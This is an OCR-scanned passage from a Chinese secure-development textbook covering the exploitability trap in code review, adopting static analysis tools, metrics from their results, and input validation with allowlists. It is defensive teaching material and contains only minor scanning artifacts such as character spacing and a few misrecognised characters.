取决 于 所 做 更 改 的 性 质 。 如 果 所 涉及 的 风险 较 大 而 所 做 的 更 改 也 不 小 ， 那 么 就 应 该 返回 到 审 
查 阶段 并 再 次 进行 代码 的 检查 。 

2. 避 开 可 利用 性 陷阱 


安全 审查 本 不 应 该 忙于 创建 一 些 华而不实 的 漏洞 利用 手段 ， 但 是 事实 上 这 种 现象 太 常见 
了 ， 安 全 审查 团队 往往 限于 漏洞 利用 手段 的 开发 之 中 。 要 理解 为 什么 会 这 样 ， 先 来 看 一 下 在 
安全 审查 期 间 ， 一 段 代 码 可 能 得 到 的 3 种 判定 : 

。 明显 是 可 利用 的 ; 

。 不 能 确定 是 否 安 全 ; 

。 明显 是 安全 的 。 

在 这 些 情况 之 间 不 存在 清晰 的 界线 ， 它 们 形成 一 种 光谱 状 的 连续 分 布 。 这 种 分 布 的 最 末 
端 比 中 间 部 分 的 麻烦 要 少 ， 明 显 可 利用 的 代码 要 进行 修补 ， 而 明显 安全 的 代码 可 以 不 用 去 管 
它 。 对 于 中 间 的 情况 ， 也 就 是 那些 不 能 确定 是 否 安全 的 代码 ， 是 比较 棘手 的 部 分 。 代 码 之 所 
以 会 不 清楚 ， 是 因为 其 逻辑 难以 跟踪 ， 因 为 难以 判断 在 何 种 情况 下 会 调用 这 段 代 码 ， 或 者 是 
因为 难以 了 解 攻击 者 会 怎样 来 利用 这 个 问题 。 

而 危险 就 在 于 审查 人 员 对 待 这 种 不 确定 代码 的 方式 。 如 果 由 审查 人 员 来 负责 在 对 代码 修 
补 之 前 证 明 这 段 代 码 是 可 利用 的 ， 那 么 ， 安 全 审查 人 员 最 终 将 误 入 歧途 而 忽略 可 利用 的 bug. 
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在 程序 员 说 “除非 你 证 明 它 是 可 利用 的 ， 否 则 我 不 会 解决 这 个 问题 ”的 时 候 ， 你 正面 对 着 可 
利用 性 陷阱 。 

可 利用 性 陷阱 是 危险 的 ， 这 有 两 种 原因 。 第 一 ， 开 发 漏洞 利用 手段 是 一 件 消耗 时 间 的 工 
作 。 与 其 将 你 的 时 间 花 在 开发 漏洞 利用 手段 上 ， 还 不 如 把 它 花 在 查找 更 多 问题 上 。 第 二 ， 开 
发 漏洞 利用 手段 是 一 种 与 其 他 工作 不 大 一 样 的 独特 技能 。 如 果 你 不 能 开发 漏洞 利用 手段 的 话 ， 
会 怎么 样 呢 ? 意味 着 这 个 缺陷 就 不 可 利用 了 吗 ? 还 是 意味 着 你 不 知道 该 用 哪些 技巧 来 利用 它 
We? 

不 要 落 入 可 利用 性 陷阱 ， 而 要 解决 这 些 bug。 如 果 一 段 代 码 不 是 明显 安全 的 ， 设 法 让 它 
变 得 明显 安全 。 有 时 这 种 方式 会 带 来 元 余 的 安全 检查 。 有 时 这 会 引起 一 种 意见 ， 要 求 提供 可 
证 实 的 方法 来 判断 这 段 代 码 是 好 的 。 而 有 时 ， 这 也 会 在 代码 中 插入 一 个 可 利用 的 漏洞 。 当 没 
有 提出 错误 时 ， 程 序 员 不 会 总 是 狂热 地 想 要 修改 代码 ， 因 为 任何 更 改 都 会 带 来 引入 新 bug 的 
可 能 性 。 但 男 一 个 方面 一 一 发 布 带 漏洞 的 代码 ， 程 序 员 更 不 愿意 这 样 。 

除了 被 忽略 的 bug 最 终 可 能 导致 的 风险 之 外 ， 一 种 新 的 漏洞 利用 方式 就 是 可 能 性 : 仅仅 
证 明 bug 的 可 能 性 ， 而 不 需要 证 明 它 是 可 利用 的 ， 这 样 ， 就 有 可 能 导致 某 个 公司 的 声誉 受 损 。 
软件 公司 有 时 会 发 现 ， 即 使 所 有 的 迹象 都 表明 某 个 缺陷 不 是 可 利用 的 ， 他 们 也 需要 发 布 相应 
的 安全 补丁 。 


432 ”开发 过 程 中 的 安全 审查 


将 安全 集成 到 软件 开发 过 程 中 , 这 说 起 来 容易 , 但 是 如 果 程 序 员 习 惯 于 忽视 安全 性 的 话 ， 
这 将 经 历 一 次 艰难 的 转变 。 评 估 和 选择 静态 分 析 工 具 可 能 是 软件 安全 的 活动 中 最 容易 的 部 分 。 
工具 可 使 得 程序 员 能 更 高 效 地 处 理 软件 安全 问题 , 但 只 有 工具 不 能 解决 任何 问题 。 换 名 话说 ， 
静态 分 析 应 该 作为 安全 的 开发 生命 周期 的 一 部 分 ， 而 不 是 用 其 替代 安全 的 开发 生命 周期 。 

任何 成 功 的 安全 的 活动 都 要 求 程序 员 接受 一 种 理念 ， 那 就 是 安全 非常 重要 。 在 传统 的 层 
次 化 组 织 中 ， 这 通常 意味 着 来 自 管理 层 的 对 安全 重要 性 的 宣言 ， 紧 跟着 一 个 或 多 个 管理 层 发 
出 的 信号 ， 说 明 安 全 确实 应 该 认真 对 待 。 

接受 静态 分 析 工 具 已 逐渐 成 为 推动 安全 的 一 部 分 。 出 于 这 一 原因 ， 静 态 分 析 和 安全 改进 
这 两 个 过 程 往往 交叉 进行 。 下 面 主要 讲述 与 工具 采用 相关 的 问题 。 

我 们 以 前 见 过 的 所 有 软件 的 开发 组 织 ， 至 少 都 有 那么 一 点 点 混乱 ， 而 要 改变 一 个 混乱 系 
统 的 行为 并 不 是 什么 好 办 的 事 。 乍 一 看 来 , 采用 一 个 静态 分 析 工 具 看 上 去 不 会 有 太 大 的 问题 。 
获得 这 个 工具 ， 运 行 之 ， 解 决 问题 。 真 的 这 么 简单 吗 ? 当然 不 是 ， 仅 仅 依靠 一 个 新 工具 就 期 
望 对 安全 状态 进行 改变 ， 这 是 不 切合 实际 的 。 

根据 我 们 的 经 验 , 要 成 功 采用 一 个 静态 分 析 工 具 , 有 3 个 大 问题 必须 回答 。 组 织 的 大 小 ， 
以 及 开发 过 程 的 类 型 和 成 熟 度 ， 在 这 些 答案 中 都 有 着 重要 的 影响 。 所 以 这 些 问题 都 没有 通用 
的 答案 ， 所 以 我 们 只 能 考虑 每 个 问题 可 能 的 答案 。 这 3 个 问题 如 下 。 

1. 谁 会 运行 此 工具 


实际 上 ， 在 理想 情况 下 谁 会 运行 这 种 工具 都 没有 什么 关系 ， 不 过 ， 从 实践 角度 考虑 ， 这 
成 了 一 个 非常 重要 的 问题 ,比如 ,对 代码 的 访问 就 需要 考虑 一 个 因素 。 对 于 谁 会 运行 此 工具 ， 
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许多 组 织 有 两 种 明显 的 选择 : 安全 团队 或 者 程序 员 。 


1) 安全 团队 

要 使 其 正常 运作 起 来 ， 我 们 必须 确保 自己 的 安全 团队 具有 适当 的 技能 一 一 简 言 之 ， 希 望 
安全 人 员 能 有 一 点 软件 开发 的 技能 。 即 使 打算 将 程序 员 作为 这 类 工具 所 产生 信息 的 主要 目标 
消费 者 ， 让 安全 团队 参与 进来 也 有 很 大 好 处 。 因 为 安全 团队 能 将 风险 管理 的 经 验 带 到 工作 中 
来 ， 并 且 也 往往 能 够 从 整体 上 考虑 一 些 安全 关注 的 问题 。 但 安全 团队 不 编写 代码 ， 所 以 团队 
成 员 对 代码 的 洞察 力 就 不 会 有 开发 人 员 那 么 强 。 对 于 安全 团队 来 说 ， 单 独 进行 代码 的 检查 是 
一 件 艰苦 的 工作 。 


2) 程序 员 

程序 员 最 了 解 他 们 的 代码 如 何 运行 。 将 这 种 优势 与 分 析 工 具 所 提供 的 漏洞 细节 相 结 合 ， 
因而 我 们 有 很 好 的 理由 允许 开发 团队 运行 这 个 操作 。 反 过 来 说 ， 程 序 员 总 是 处 于 在 最 后 期 限 
之 前 构建 产品 的 压力 之 下 。 即 使 是 经 过 培训 ， 程 序 员 似 乎 也 不 会 有 和 安全 团队 成 员 同 等 水 平 
的 安全 知识 和 经 验 。 如 果 程序 员 要 使 用 分 析 工 具 ， 那 么 要 确保 他 们 有 时 间 能 在 其 计划 表 中 排 
出 这 方面 的 时 间 ， 并 且 要 确保 他 们 经 过 了 足够 的 安全 培训 ， 从 而 在 其 工作 中 起 到 作用 。 根 据 
我 们 的 经 验 ， 并 不 是 所 有 程序 员 都 会 成 为 工具 的 操作 者 。 在 每 个 团队 中 要 指派 一 个 高 级 成 员 
来 负责 运行 此 工具 ， 确 保 适 当地 使 用 结果 ， 并 回答 团队 内 其 他 程序 员 与 工具 相关 的 问题 。 


3) 以 上 全 体 成 员 

第 3 种 选择 就 是 让 程序 员 以 只 产生 高 可 信 结 果 的 模式 运行 这 类 工具 ， 而 通过 安全 团队 来 
指导 那些 更 为 彻底 但 执行 频率 较 低 的 审查 。 这 样 落 在 程序 员 肩 上 的 负担 也 不 会 太 重 ， 同 时 仍 
然 允 许 他 们 捕获 某 些 自己 的 错误 。 这 样 做 也 促进 了 安全 团队 和 开发 团队 之 间 的 交流 。 毫 无 疑 
问 ， 团 队 合作 工作 是 最 佳 的 。 

2. 什么 时 候 运行 此 工具 


决定 什么 时 候 运 行 此 工具 ， 这 比 其 他 问题 更 大 程度 地 决定 了 组 织 开展 安全 审查 的 方式 ， 
就 这 个 问题 来 说 ， 有 许多 可 能 的 答案 ， 但 我 们 最 常 听 到 的 是 这 样 3 种 : 在 代码 编写 期 间 、 程 
序 生成 的 时 候 ， 以 及 在 到 达 整 个 开发 过 程 中 的 重要 里 程 碑 时 。 恰 当 的 答案 取决 于 此 工具 产生 
的 分 析 结 果 将 如 何 使 用 ， 还 取决 于 运行 此 工具 需要 耗费 多 少时 间 。 


1) 在 代码 编写 期 间 

众多 的 研究 记载 表明 ， 修 复 一 个 bug 所 需 的 开销 随 着 时 间 的 推移 而 不 断 增长 ， 因 此 尽快 
对 新 代码 进行 检查 ， 这 是 有 道理 的 。 实 现 这 一 目标 的 一 种 方式 是 将 源 代码 分 析 工 具 集 成 到 程 
序 员 的 开发 环境 中 ， 这 样 ， 程 序 员 就 可 以 按 需 运行 分 析 ， 并 随时 间 的 推移 ， 利 用 此 工具 获得 
专家 意见 。 另 一 种 方法 是 将 扫描 集成 到 代码 提交 过 程 从 而 能 集中 控制 这 种 分 析 。 如 果 程 序 员 
运行 此 工具 的 次 数 较 多 ， 那 么 此 工具 就 需要 快速 运行 而 且 易于 使 用 。 对 于 大 型 项 目 ， 这 可 能 
意味 着 要 求 每 个 程序 员 只 分 析 自 己 的 代码 部 分 ， 而 后 在 程序 生成 时 或 者 达到 重要 里 程 碑 时 再 
针对 整个 程序 运行 分 析 。 
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2) 在 程序 生成 时 

对 于 大 多 数组 织 来 说 ， 软 件 项 目 都 有 一 个 定义 完备 的 程序 生成 过 程 ， 通 常 都 采用 有 规律 
的 预定 时 间 节 点 。 在 程序 生成 时 执行 的 分 析 为 代码 审查 人 员 提 供 了 一 份 可 靠 的 报告 ， 此 报告 
可 用 于 指导 问题 纠正 的 过 程 ， 同 时 ， 此 报告 也 可 为 进一步 展开 人 工 代 码 检查 提供 了 一 份 原始 
资料 。 此 外 ， 通 过 将 程序 生成 作为 源 代码 分 析 的 时 间 节 点 ， 我 们 就 创建 了 一 种 整个 项 目的 重 
复 、 一 致 的 估量 方法 ， 这 为 分 析 驱 动 的 度量 法 提供 了 完美 的 输入 。 这 是 一 种 非常 好 的 方式 ， 
通过 这 种 方式 ， 可 以 获取 用 于 培训 计划 的 资料 。 


3) 到 达 整 个 开发 过 程 中 的 重要 里 程 碑 时 

较 大 程度 上 依赖 于 各 种 过 程 的 组 织 在 项 目的 每 个 里 程 碑 处 都 会 设置 检查 点 ， 这 种 里 程 碑 
通常 会 临近 开发 周期 结束 或 者 是 在 开发 期 间 的 某 些 大 的 间隔 期 。 这 些 检查 点 有 时 会 包含 一 些 
安全 相关 的 任务 ， 比 如 设计 审查 或 者 渗透 测试 。 从 逻辑 上 对 此 概念 进行 延伸 ， 检 查 点 像 是 一 
个 同时 使 用 静态 分 析 工 具 的 天 然 位 置 。 这 种 方式 的 负面 影响 就 是 ， 程 序 员 可 能 会 将 对 安全 的 
考虑 一 直 拖延 到 里 程 碑 逼 近 的 时 候 ， 在 这 个 时 候 ， 制 定 别 的 里 程 碑 职 责 ， 将 会 把 安全 一 直 推 
到 一 种 边缘 位 置 。 如 果 我 们 打算 等 到 到 达 里 程 碑 时 再 使 用 静态 分 析 ， 要 确保 在 此 过 程 中 建立 
- 些 强 制 性 的 有 效 手段 。 忽 视 安全 的 后 果 要 能 立即 可 见 ， 并 提前 让 所 有 人 都 知道 。 

3. 分 析 结 果 会 如 何 


当 人 们 仔细 考虑 分 析 工具 采用 过 程 的 时 候 ， 往 往 会 忘记 绝 大 部 分 的 工作 是 在 工具 运行 之 
后 出 现 的 。 提 前 决定 实际 的 代码 审查 应 如 何 执行 ， 是 非常 重要 的 。 


1) 分 析 工 具 的 输出 阻塞 软件 发 布 

在 项 目 里 程 碑 到 来 时 ， 安 全 团队 将 分 析 工 具 的 输出 作为 检查 点 的 一 部 分 进行 处 理 ， 并 对 
其 进行 优先 级 排序 。 开 发 团队 收 到 排序 的 结果 以 及 安全 团队 关于 应 进行 修补 部 分 的 建议 。 然 
后 ,开发 团队 决定 哪些 问题 要 解决 ， 而 哪些 问题 归 类 为 “可 接受 的 风险 ”。 安 全 团队 应 对 开发 
团队 的 决定 进行 审查 ， 并 且 ， 对 于 那些 看 上 去 开发 团队 所 承担 的 比 本 应 承担 的 风险 要 高 的 地 
方 ， 应 逐步 加 强 用 例 。 如 果 这 种 审查 会 妨碍 项 目 按照 预期 实现 里 程 碑 的 目标 ， 那 么 软件 发 布 
就 真 的 不 那么 顺畅 了 。 如 果 程 序 员 可 以 完全 不 理 皮 分 析 结 果 ， 那 么 他 们 就 没有 针对 问题 进行 
修改 的 动机 。 

对 于 维护 安全 而 言 ， 渗 透 测试 是 一 种 难以 胜任 的 方式 ， 同 样 道理 ， 这 种 模型 对 于 安全 来 
说 也 是 一 种 难以 胜任 的 方式 : 它 是 一 种 反应 式 方法 。 即 使 软件 发 布 并 不 是 一 种 好 的 长 期 解决 
方案 ， 但 它 可 以 是 一 种 有 效 的 达成 目的 的 手段 。 


2) 由 中 心 权威 机 构 少 量 发 放 个 别 结果 

工具 使 用 者 的 核心 小 组 可 为 一 个 或 多 个 项 目 查看 所 报告 的 问题 ， 然 后 选 出 个 别 问题 发 送 
给 负责 问题 代码 的 程序 员 。 这 种 情况 下 ， 葵 态 分 析 工具 应 报告 所 有 可 报告 的 问题 ， 目 标 是 不 
留任 何 死角 。 
因为 在 形成 最 终 报告 之 前 ， 熟 练 的 分 析 师 会 处 理 所 有 结果 ， 多 疑 误 报 的 情况 在 这 里 并 不 
是 太 关心 的 问题 。 通 过 这 种 模式 ， 工 具 使 用 者 的 核心 小 组 可 通过 少量 定制 ， 熟 练 使 用 此 工具 ， 
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进而 能 够 逐渐 对 大 量 结果 进行 熟练 检查 。 


3) 由 中 心 权威 机 构 设置 精确 的 关键 问题 

一 个 组 织 中 存在 着 大 量 项 目 ， 因 而 ， 即 便 审 查 人 员 的 效率 相当 高 ， 管 理 中 心 的 效率 会 逐 
渐 受 限于 参与 结果 审查 的 人 数 。 不 过 ， 通 常 大 部 分 严重 的 安全 问题 都 会 高 度 集中 于 少量 类 型 
的 问题 。 根 据 这 种 情况 ， 项 目 团队 将 会 把 工具 限于 针对 少量 特殊 的 问题 类 型 而 使 用 ， 这 些 类 
型 的 问题 会 根据 该 组 织 所 面临 的 风险 ， 随 着 时 间 的 推移 而 发 展 或 者 变化 。 最 后 ， 定 义 一 组 运 
行 良好 的 一 定 范围 内 的 问题 类 型 ， 将 其 作为 一 种 集中 控制 的 策略 、 标 准 ， 或 者 是 一 组 指导 方 
针 。 其 变化 的 速度 应 该 与 开发 团队 修改 并 解决 所 有 处 于 此 范围 内 的 问题 的 速度 同步 。 从 总 体 
上 来 看 ， 这 种 方式 为 人 们 提供 了 一 种 机 会 ， 即 随 着 工具 的 使 用 和 时 间 的 推移 ， 逐 步 积 累 经 验 
慢 慢 成 为 专家 。 

综 上 所 述 ， 安 全 工具 倾向 于 预先 配置 以 检测 出 尽 可 能 多 的 问题 。 这 里 有 一 个 经 验 : 从 小 
处 着 手 。 避 开 分 析 工 具 能 检测 的 大 部 分 东西 ， 而 后 集中 于 小 范围 的 重点 且 熟 知 的 问题 。 只 有 
当 存 在 有 使 用 分 析 工 具 的 工作 程序 、 且 初始 关注 的 问题 已 经 得 到 控制 的 时 候 ， 才 可 以 扩大 检 
测 的 问题 范围 。 

4.3.3 静态 分 析 度量 标准 


源 自 静 态 分 析 结 果 的 度量 标准 可 用 于 排序 补救 工作 的 优先 级 、 在 多 个 项 目 之 间 调 配 资 
源 、 从 高 效 的 安全 过 程 获 得 反馈 。 理 想 情况 下 ， 应 该 能 使 用 源 自 静 态 分 析 结 果 的 度量 标准 来 
帮助 量化 与 某 段 代 码 相 关 的 风险 总 量 ， 但 使 用 工具 来 进行 风险 估量 是 很 难 做 到 的 。 最 明显 的 
问题 是 始终 存在 的 误 报 和 漏 报 ， 不 过 ， 对 其 进行 补偿 还 是 有 可 能 的 。 通 过 手工 方式 审计 足够 
多 的 结果 ， 对 于 某 个 给 定 项 目 ， 安 全 团队 可 预知 误 报 和 漏 报 发 生 的 几率 ， 并 从 一 组 原始 的 结 
果 中 推断 出 正确 判定 的 问题 数量 。 使 用 静态 分 析 来 量化 风险 的 更 深层 问题 是 没有 太 好 的 方法 
来 计算 由 一 组 漏洞 带 来 的 风险 总 量 。 两 个 缓冲 区 溢出 所 带 来 的 风险 是 单个 缓冲 区 溢出 的 两 倍 
吗 ? 那么 十 个 呢 ? 由 工具 识别 出 的 代码 级 漏洞 完全 不 能 算 作对 风险 的 精确 刻画 。 

我 们 不 应 该 试图 使 用 静态 分 析 结 果 来 直接 量化 风险 ， 而 应 将 其 作为 一 种 战术 级 的 方法 ， 
用 以 集中 安全 工作 的 焦点 ， 并 作为 一 种 创建 代码 的 过 程 的 间接 度量 。 许 多 简单 的 度量 标准 都 
可 通过 静态 分 析 结 果实 例 化 。 我 们 来 看 看 下 面 这 些 度量 标准 。 


1) 估量 漏洞 密度 

将 静态 分 析 结 果 的 数量 除 以 代码 行 数 ， 就 得 到 了 漏洞 密度 。 用 漏洞 密度 对 风险 进行 评估 
是 一 种 糟糕 的 方式 ， 但 对 于 估量 进行 完整 的 审查 所 需 的 工作 量 来 说 ， 这 是 一 种 不 错 的 方式 。 
因为 ， 比 较 不 同 模块 或 者 不 同 项 目的 漏洞 密度 ， 有 助 于 用 公式 化 的 方法 进行 审查 工作 的 优先 
级 排序 。 不 断 跟 踪 漏 洞 密度 ， 可 以 洞察 工具 的 输出 是 否 引 起 了 注意 。 


2) 通过 严重 性 比较 项 目 
静态 分 析 结果 可 用 于 项 目 比 较 。 图 4-6 展示 了 两 个 模块 间 的 一 种 比较 : 
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图 4-6 通过 严重 性 分 组 两 子 项 目 源 代码 分 析 结果 

其 中 就 是 用 了 通过 严重 性 分 组 的 源 代 码 分 析 结 果 ， 这 张 图 表 提 供 了 一 种 行动 计划 的 建 
议 : 检验 第 一 个 模块 的 关键 性 问题 ， 而 后 转 到 第 二 个 模块 的 严重 程度 较 高 的 问题 。 

通过 并 列 比较 项 目 ， 可 以 帮助 人 们 了 解 他们 所 面临 的 工作 有 多 少 ， 与 同事 们 的 工作 相 比 
如 何 。 当 你 提供 项 目 对 比 时 ， 要 点 出 名 字 ， 指 定 到 每 个 人 。 

3) 通过 类 别 来 细 分 结果 

图 4-7 给 出 了 通过 类 别 划分 的 单个 项 目的 分 析 结 果 。 这 张 圆 形 统计 图 给 出 了 解决 每 个 类 
型 问题 大 致 需要 的 补救 工作 量 。 该 图 还 提示 我 们 ， 在 即将 到 来 的 培训 课程 中 ， 日 志 伪造 和 跨 
站 点 执行 脚本 是 很 好 的 话题 。 
外 日 志 伪造 (12) 
m 跨 站 点 执行 脚本 (12) 
m 侵犯 隐私 (3) 
日 竞 态 条 件 (2) 
日 口令 管理 (1) 


图 4-7 通过 类 别 细 分 的 源 代码 分 析 结 果 


源 代码 分 析 结 果 也 可 指出 发 展 趋势 。 关 注 安全 的 团队 将 在 他 们 的 代码 中 减少 静态 分 析 的 
发 现 。 发 现 的 问题 数量 急剧 增长 的 情况 值得 注意 。 

4) 对 趋势 进行 监测 

某 些 类 型 问题 的 绝对 存在 可 作为 一 种 对 较 普遍 的 安全 缺陷 的 早期 指示 器 。 判 断 这 类 可 作 
为 前 期 指示 器 的 问题 ， 要 求 具 有 使 用 检查 特定 类 别 软件 的 某 些 经 验 。 根 据 我 们 的 经 验 ， 对 于 
C 语言 编写 的 程序 来 说 ， 大 量 与 字符 相关 的 缓存 区 溢出 就 是 问题 的 一 种 征兆 。 

更 复杂 的 度量 利用 源 代码 分 析 器 的 能 力 ， 在 不 同 的 构建 版 本 之 间 针 对 同样 问题 给 出 同样 
的 标示 符 。 通 过 不 断 跟踪 同一 个 问题 ， 并 将 其 与 人 工 审计 提供 的 反馈 相 结合 ， 源 代码 分 析 器 
可 检查 项 目的 进展 。 例 如 ， 静 态 分 析 结 果 能 揭示 开发 团队 对 安全 漏洞 的 响应 方式 。 在 审计 
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人 员 识 别 出 一 个 漏洞 后 ， 程 序 员 平均 花 多 长 时 间 解 决 这 个 问题 ? 我 们 将 这 段 时 间 称 为 漏洞 停 
留 期 。 

静态 分 析 结 果 还 可 以 帮助 安全 团队 决定 何 时 对 某 段 代码 进行 审计 。 审 计 频 率 应 与 开发 的 
速度 保持 同步 。 但 更 好 的 情况 是 ， 它 应 与 潜在 的 安全 问题 引入 代码 的 速度 保持 同步 ， 同 步 
持续 跟踪 某 个 问题 的 静态 分 析 结果 能 向 安全 团队 展示 在 一 个 项 目 中 包含 了 多 少 未 经 审查 的 
问题 。 


44 ”静态 分 析 中 的 常见 缺陷 


在 前 面 3.2 节 中 ， 从 编程 的 角度 分 析 了 如 何 降低 “处 理 输入 ”“ 缓 冲 区 溢出 ”“ 错 误 和 
异常 ”这 些 安 全 风险 的 技术 手段 。 而 本 节 将 从 实际 应 用 的 角度 分 析 这 些 安全 问题 。 


4.4.1 输入 的 处 理 


开发 人 员 所 能 采用 的 最 重要 防范 措施 是 验证 应 用 程序 所 接收 的 全 部 输入 。 输 入 验证 和 表 
示 方 法 是 最 重要 的 ， 因 为 不 检测 输入 或 者 不 能 够 正确 地 检测 输入 会 导致 某 些 恶意 攻击 ， 包 括 
缓冲 区 溢出 、SQL 注入 攻击 以 及 其 他 许多 攻击 。 

程序 员 最 有 资格 确定 在 他 们 的 应 用 程序 中 哪 种 输入 才 是 合法 有 效 的 。 这 种 判断 在 需要 依 
赖 正确 输入 来 产生 正确 结果 的 情况 下 显得 更 加 重要 。 程 序 员 也 许 不 能 够 确定 所 接收 到 的 所 有 
输入 是 否 都 是 正确 的 ， 却 可 以 保证 它们 不 具有 明显 的 错误 。 不 要 期 望 所 有 输入 都 具有 正确 的 
格式 ， 更 不 要 因为 某 个 输入 的 来 源 似乎 是 可 靠 的 或 者 安全 的 ， 就 完全 相信 它 。 不 要 因为 某 个 
输入 是 由 你 所 编写 的 程序 代码 来 生成 的 就 相信 它 ， 你 的 应 用 程序 也 许 是 从 某 个 不 太 可 信 的 来 
源 接收 到 这 个 输入 ， 或 者 这 个 可 信 来 源 本 身 就 受到 安全 威胁 。 当 输入 验证 程序 确定 输入 存在 
问题 时 ， 应 当 拒绝 接受 输入 ， 不 要 尝试 纠正 问题 然后 继续 接受 输入 。 简 而 言 之 ， 怀 疑 所 处 理 
的 一 切 输 入 ， 无 论 如 何 ， 保 证 应 用 程序 的 安全 是 首要 任务 。 

程序 员 不 得 不 接收 用 户 的 输入 ， 但 又 不 能 够 相信 和 输入， 因此 严格 检测 输入 并 验证 其 正 
确 性 ， 将 输入 的 值 限 定 在 某 个 能 够 接受 的 范围 内 才 是 明智 的 做 法 。 这 个 过 程 ， 通 常 称 为 输 
入 验证 。 

1. 验证 内 容 


许多 应 用 程序 接收 多 个 来 自 于 不 同 来 源 的 数据 ， 并 利用 这 些 数 据 进行 各 种 运算 操作 。 无 
论 最 初 是 从 应 用 程序 的 外 部 读 取 数 据 ， 还 是 在 具体 安全 环境 中 使 用 这 些 数 据 ， 输 入 验证 都 在 
软件 安全 性 中 扮演 了 重要 角色 。 本 节 讨论 输入 验证 的 两 个 方面 : 需要 验证 的 输入 的 种 类 、 依 
赖 于 验证 后 输入 的 操作 的 种 类 。 

1) 验证 所 有 输入 

本 节 的 核心 思想 是 : 验证 所 有 输入 数据 。 仔 细 思 考 这 个 问题 ， 我 们 不 要 认为 只 有 用 户 从 
输入 界面 输入 的 数据 才 是 输入 数据 ， 而 要 将 输入 数据 的 范围 定义 得 更 广泛 一 些 。 另 外 ， 如 果 
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一 个 应 用 程序 包括 多 个 过 程 ， 则 每 个 过 程 的 输入 数据 都 需要 进行 验证 ， 即 使 该 输入 数据 来 自 
于 同一 程序 的 其 他 过 程 也 同样 如 此 。 再 次 ， 即 使 输入 数据 是 通过 一 个 安全 连接 传递 过 来 的 
或 者 访问 应 用 程序 的 用 户 只 能 是 可 信用 户 ， 也 要 对 其 进行 验证 。 最 后 ， 来 自 操作 系统 环境 的 
输入 数据 也 不 能 轻易 相信 ， 这 其 中 当然 包括 路 径 名 称 和 注册 表 值 。 应 用 程序 执行 的 每 次 验证 
都 拒绝 了 攻击 方 的 一 次 攻击 机 会 ， 并 增加 了 自己 的 安全 系数 。 

如 果 已 经 确定 应 用 程序 的 逻辑 和 功能 ， 则 可 将 输入 验证 程序 分 为 两 个 主要 部 分 : 语法 检 
查 和 语义 检查 。 前 者 主要 检测 输入 格式 正确 与 否 ， 它 通常 可 以 远离 应 用 程序 的 逻辑 部 分 ， 紧 
接着 数据 输入 模块 执行 ， 后 者 主要 确定 输入 恰当 与 否 ， 由 于 与 逻辑 密切 相关 ， 它 通常 紧 靠 着 
应 用 程序 的 逻辑 部 分 。 

在 编写 应 用 程序 时 ， 要 达到 如 下 目的 : 如 果 这 个 应 用 程序 将 来 由 其 他 程序 员 来 维护 ， 在 
不 扩展 验证 逻辑 以 覆盖 新 输入 点 的 情况 下 ， 后 来 的 程序 员 无 法 或 者 很 难 在 应 用 程序 中 添加 一 
个 新 输入 点 。 输 入 验证 逻辑 程序 应 该 要 求 应 用 程序 将 所 有 的 输入 数据 都 传递 进来 并 且 拒绝 所 
有 未 通过 验证 的 输入 。 


2) 验证 各 种 来 源 的 输入 

不 要 将 软件 的 安全 寄托 在 配置 、 使 用 和 维护 人 员 的 敏锐 理解 力 、 深 刻 洞察 力 或 良好 意愿 
上 。 安 全 不 仅 需 要 验证 用 户 输入 ， 还 需要 验证 所 有 来 自 软件 之 外 的 输入 。 这 些 输 入 应 当 包 括 
下 列 内 容 ， 但 并 非 局 限于 此 : 命令 行 参数 、 配 置 文件 、 环 境 变 量 、 注 册 表 值 、 数 据 库 查询 、 
临时 文件 。 

常会 有 一 些 开发 人 员 不 愿 对 各 种 来 源 的 输入 都 进行 验证 ， 他 们 的 理由 是 :“ 我 并 不 认为 
会 有 人 从 这 些 地 方 来 攻击 我 的 程序 ， 为 什么 我 必须 要 耗费 这 么 多 时 间 和 精力 来 编写 这 些 输 入 
验证 程序 ， 以 保证 软件 的 安全 呢 ? ”这 种 态度 显然 会 导致 软件 的 一 些 谋 点， 使 得 软件 易于 受 
到 攻击 。 目 光 短 浅 的 程序 员 也 许 会 想 : “如 果 攻 击 者 已 经 具备 修改 系统 性 能 参数 的 能 力 , 就 已 
经 达到 目的 了 。 "实际 上 ,攻击 者 可 以 很 轻易 地 找到 方法 略微 改变 一 下 系统 文件 或 者 某 个 脚本 
或 者 也 可 以 伪造 出 一 个 真实 的 配置 错误 。 无 论 哪 一 种 情况 ， 负 乏 输入 验证 都 是 成 为 攻击 者 攻 
破 整 个 系统 的 途径 。 并 非 所 有 的 输入 都 是 相同 的 。 对 于 来 自 配置 文件 的 输入 所 进行 的 验证 往 
往 不 同 于 对 用 户 输入 所 进行 的 验证 。 但 无 论 来 源 如 何 ， 所 有 输入 都 至 少 应 当 进 行 一 致 性 验证 
和 语法 验证 。 

2. 验证 方法 

一 旦 确定 在 应 用 程序 中 的 哪些 地 方 需要 进行 输入 验证 ,就 必须 确定 选择 哪 种 策略 来 完成 
验证 。 

。 使 用 强 输 入 验证 

进行 输入 验证 的 最 好 方法 就 是 根据 一 系列 已 知 的 正确 人 来 检验 输入 。 正 确 值 输入 验证 法 
并 不 党 试 检验 某 些 特 定 的 错误 值 。 这 就 类 似 于 一 个 需要 邀请 函 才能 参加 的 晚会 。 如 果 需 要 保 
证 只 有 收 到 邀请 的 客人 才能 入 场 ， 最 好 的 方法 就 是 开 列 一 个 客人 清单 ， 并 且 在 入 门 时 核对 。 
千 万 不 要 试图 列 出 一 个 没有 被 邀请 人 员 的 清单 来 进行 校 验 。 

通过 已 知 正确 值 的 清单 来 进行 输入 检验 称 为 白 名 单 法 。 当 可 能 输入 的 集合 比较 小 时 ， 可 
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以 使 用 间接 选择 来 确保 不 能 绕 过 白 名 单 。 当 进行 输入 验证 时 ， 间 接 选 择 是 首选 方法 。 最 差 的 
方法 是 黑 名 单方 法 : 尝试 枚 举 所 有 的 不 能 接受 的 输入 值 。 

1) 间接 选择 : 一 般 来 说 , 应 用 程序 所 能 容忍 的 意外 输入 的 次 数 越 少 , 其 安全 性 也 会 越 高 。 
因此 ， 利 用 一 个 间接 输入 层 进行 输入 验证 应 该 算是 最 好 方式 ， 列 出 一 个 包含 所 有 合法 有 效 数 
据 的 清单 ， 并 且 只 允许 用 户 提供 包含 在 该 清单 中 的 特定 索引 值 。 通 过 这 种 方法 ， 应 用 程序 四 
辑 就 不 需要 直接 面 对 用 户 提供 的 输入 ， 而 只 需 要 验证 用 户 是 否 提供 了 一 个 合法 的 索引 。 虽 然 
这 种 输入 验证 方式 有 点 脱离 实际 , 但 当 用 户 需要 从 很 多 值 中 做 出 选择 时 , 这 是 最 理想 的 方式 。 
